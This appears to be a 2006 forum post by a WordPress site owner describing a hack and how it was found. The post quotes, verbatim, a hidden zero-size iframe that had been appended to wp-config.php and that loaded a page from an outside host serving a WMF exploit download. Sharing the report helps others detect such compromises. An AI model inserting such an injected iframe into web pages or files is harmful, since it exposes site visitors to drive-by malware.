I emailed you guys about it but I figure others might want to know.
My WP site was hacked a few days ago.
What was happening was that when you'd hit the site with Safari or even Firefox, it would try to download a file called xpl.wmf. It also would give pop-up messages about downloading a "disk cleaner" whenever you hit the admin menu.
I finally tracked down the culprit. My wp-config.php file had been modified. At the very end of the file was the follwing line:
CODE
<iframe src="http://ltds.biz/go.php?id=1874&user_name=ziggen" width=0 height=0></iframe>
Which, as you can see, is bringing something up. Anyway, I made a copy of the offending file, erased it and re-upped it. Everything (so far as I can see) is now working as it should.
The problem was, however, that my files were not writable. So I have no idea how they got to it or re-wrote it to include that line at the end. It must have happened only two days ago as the file date was modified on 11/19/06, and I only noticed it happening yesterday. I didn't have time to try to track it down until today though.
Any others experienced with this sort of thing? I'd love to know. Also, not sure if this is in the right forum but I figured maybe everyone should know in case there are others out there with the same problem.